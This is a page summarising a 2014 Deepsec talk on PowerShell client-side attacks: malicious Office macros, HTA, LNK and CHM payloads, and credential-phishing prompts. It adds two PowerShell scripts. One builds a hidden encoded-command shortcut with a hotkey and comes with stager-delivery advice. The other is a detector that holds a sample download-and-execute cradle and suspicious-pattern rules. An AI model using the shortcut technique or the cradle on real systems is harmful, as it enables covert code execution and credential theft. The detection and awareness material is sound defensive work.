Advanced Powershell Threat – Lethal Client Side Attacks

By Nikhil Mittal on 16 Sep 2014 @ Deepsec
#powershell #red-teaming #endpoint-protection #keylogging #phishing #security-training #code-injection
Focus Areas: 🛡️ Security Operations & Defense , 💻 Endpoint Security , 🦠 Malware Analysis , 🎯 Penetration Testing , 📚 Security Awareness

Abstract

APT - A buzzword which refuses to die. Let's have some fun with it; let's move it to PowerShell. This talk would focus on using PowerShell for client side attacks. PowerShell is an ideal platform for client side attacks as it is available on all the Windows machines. We would see how easy and effective it is to use PowerShell for various client side attacks like drive-by-downloads, malicious attachments, Java applets, Human Interface Devices etc. The payloads which would be used with these attacks include in-memory code execution, dumping passwords and system secrets in plain text, backdoors, keyloggers, moving to other systems, reverse shells etc. The code used in the above talk will be released as open source. The talk would be full of live demonstrations.

AI Generated Summary

This talk addresses the effectiveness of client-side attacks using PowerShell, arguing that server-side vulnerabilities are increasingly monitored and patched, while client systems often remain less protected. PowerShell is highlighted as a powerful, native Windows component present by default on most targets, providing extensive access to system administration, WMI, .NET classes, and Active Directory without requiring additional tools.

The presenter introduces a toolkit for automating the creation of malicious documents and payloads. Key tools include:

  • Out-Word/Out-Excel: Generates Word or Excel files carrying auto-executing VBA macros that download a PowerShell script and run it in memory. Macro security warnings are suppressed by modifying the relevant Office registry values. The tool can also recursively infect existing DOCX/XLS files on a file server, preserving their timestamps so the modified documents do not stand out.
  • Out-HTA: Creates an HTML Application (HTA) and VBScript pair hosted on a web server; when the victim runs the HTA the PowerShell payload executes, but the victim is shown several security warnings along the way.
  • Out-Shortcut: Generates a malicious LNK shortcut whose target is powershell.exe with the command embedded in the shortcut's arguments. The shortcut can be assigned a hotkey (e.g., F5) so the payload re-runs every time the key is pressed, and it uses the fixed PowerShell path (the WindowsPowerShell\v1.0 directory name has never changed) so one shortcut works across Windows versions.
  • Out-CHM: Compiles a malicious Compiled HTML Help (CHM) file using Microsoft's HTML Help Workshop. When opened, it executes the PowerShell payload silently, leveraging an older file format that may evade detection.

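The Out-Shortcut bullet above describes an LNK whose target is powershell.exe, with the command carried in the shortcut's arguments and a hotkey that re-triggers it. The following is an added example written for this page, not Nishang's Out-Shortcut code: it builds the `-EncodedCommand` string the way powershell.exe expects it (base64 of the UTF-16LE command text) and writes the shortcut through the WScript.Shell COM object. The payload, the shortcut name `Report.lnk` and the icon are placeholders chosen for the example; the payload only writes a marker file so the mechanism can be tested safely.

```powershell
# Added example (not Nishang's Out-Shortcut): wrap an encoded PowerShell
# command in a .lnk with a hotkey. Payload and file names are placeholders.

# Benign placeholder payload; an attacker would put a download-and-run stager here.
$payload = 'Set-Content -Path "$env:TEMP\lnk-ran.txt" -Value (Get-Date)'

# powershell.exe -EncodedCommand decodes base64 as UTF-16LE, so encode it that way.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))

# The v1.0 directory name has never changed, so this path works on every
# Windows version that ships PowerShell; that is why shortcuts can hard-code it.
$psPath = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe"

$lnkPath = Join-Path $env:TEMP 'Report.lnk'
$shell   = New-Object -ComObject WScript.Shell
$lnk     = $shell.CreateShortcut($lnkPath)
$lnk.TargetPath       = $psPath
$lnk.Arguments        = "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand $encoded"
$lnk.WorkingDirectory = $env:TEMP
$lnk.Hotkey           = 'F5'                                  # re-runs the payload on every F5
$lnk.IconLocation     = "$env:SystemRoot\System32\shell32.dll,1"   # generic document icon
$lnk.Description      = 'Quarterly report'
$lnk.Save()

"Shortcut written to $lnkPath"
"Argument length: $($lnk.Arguments.Length) characters"
```

Two practical points. Windows only honours shortcut hotkeys for .lnk files that live on the Desktop or in the Start Menu, so a shortcut delivered elsewhere has to be moved there (or opened by hand) before F5 does anything. And the whole argument string is visible in process-creation logging and in the shortcut itself, which is why a short stager that downloads the real script, as the Out-Word macros described above do, is preferable to embedding a long encoded payload.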
Demonstrations show retrieving Meterpreter sessions via these payloads, using encoded PowerShell commands to sidestep the execution policy (which is a safeguard against accidental script execution rather than a security boundary, so no privileges are needed), and performing post-exploitation tasks like network reconnaissance, credential dumping, and recursive infection, all without special privileges. A noted technique involves a phishing prompt that locks the screen until valid credentials are entered.

Defensive recommendations emphasize user awareness training, disabling VBA macros where possible, and monitoring PowerShell command lines and script activity, since abuse of a native tool blends in with legitimate administration and complicates detection. The talk concludes that PowerShell-based client-side attacks remain highly effective because they rely only on built-in Windows functionality and on the persistent difficulty of securing end-user behaviour.
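For the monitoring recommendation, the following is an added example, not code from the talk or from Nishang, of the triage a defender can run over captured PowerShell command lines and over the Office macro-security registry values that the Out-Word bullet above depends on. The three command lines and the 192.0.2.10 URL are constructed for this example (192.0.2.0/24 is a documentation range), and the function names `Test-SuspiciousPowerShellCommandLine` and `Get-OfficeMacroSecurity` are chosen here.

```powershell
# Added example (not from the talk): flag the command-line patterns these
# payloads share, decode -EncodedCommand, and audit Office macro-security keys.

function Test-SuspiciousPowerShellCommandLine {
    param([Parameter(Mandatory = $true)][string]$CommandLine)

    $findings = New-Object System.Collections.Generic.List[string]

    # -EncodedCommand (or any unambiguous prefix: -e, -ec, -enc, ...) followed by
    # base64. powershell.exe decodes it as UTF-16LE, so do the same.
    if ($CommandLine -match '(?i)\s-e[a-z]*\s+([A-Za-z0-9+/=]{20,})') {
        $findings.Add('encoded command')
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
            $findings.Add("decoded: $decoded")
            $CommandLine += " $decoded"        # run the rules below over the decoded text too
        } catch {
            $findings.Add('base64 decode failed')
        }
    }
    if ($CommandLine -match '(?i)-e[a-z]*\s+bypass')          { $findings.Add('execution policy bypass') }
    if ($CommandLine -match '(?i)-w(indowstyle)?\s+hidden')   { $findings.Add('hidden window') }
    if ($CommandLine -match '(?i)DownloadString|DownloadFile|WebClient|Invoke-Expression|\bIEX\b') {
        $findings.Add('download/execute cradle')
    }

    [pscustomobject]@{
        Suspicious  = ($findings.Count -gt 0)
        Findings    = $findings.ToArray()
        CommandLine = $CommandLine
    }
}

# Constructed sample command lines, not real telemetry.
$stager        = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/p.ps1')"
$encodedStager = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))
$samples = @(
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand $encodedStager",
    'powershell.exe -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''http://192.0.2.10/p.ps1'')"',
    'powershell.exe -NoProfile -File C:\Scripts\Backup.ps1'     # benign scheduled job
)
$samples | ForEach-Object { Test-SuspiciousPowerShellCommandLine -CommandLine $_ } |
    Format-List Suspicious, Findings, CommandLine

function Get-OfficeMacroSecurity {
    # VBAWarnings: 1 = enable all macros, 2 = disable with notification (default),
    # 3 = disable except digitally signed, 4 = disable all without notification.
    # AccessVBOM = 1 grants "Trust access to the VBA project object model", which is
    # what lets a macro write VBA into other documents (the recursive-infection case).
    foreach ($key in Get-ChildItem 'HKCU:\Software\Microsoft\Office' -ErrorAction SilentlyContinue) {
        foreach ($app in 'Word', 'Excel') {
            $sec = Join-Path $key.PSPath "$app\Security"
            if (Test-Path $sec) {
                $p = Get-ItemProperty $sec
                [pscustomobject]@{
                    Office      = $key.PSChildName
                    App         = $app
                    VBAWarnings = $p.VBAWarnings
                    AccessVBOM  = $p.AccessVBOM
                    Risky       = ($p.VBAWarnings -eq 1) -or ($p.AccessVBOM -eq 1)
                }
            }
        }
    }
}

Get-OfficeMacroSecurity | Format-Table -AutoSize
```

In production the command lines come from Security event 4688 (with command-line auditing enabled in policy), from Sysmon event 1, or, on PowerShell 5 and later, from script block logging (event 4104), where the decoded script is already available and the base64 step is unnecessary. The first two samples should be reported as suspicious and the third as clean; the registry check is where a macro-warning setting weakened to VBAWarnings=1, or AccessVBOM=1 enabling document-to-document infection, becomes visible per Office version.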

Disclaimer: This summary was auto-generated from the video transcript using AI and may contain inaccuracies. It is intended as a quick overview; always refer to the original talk for authoritative content.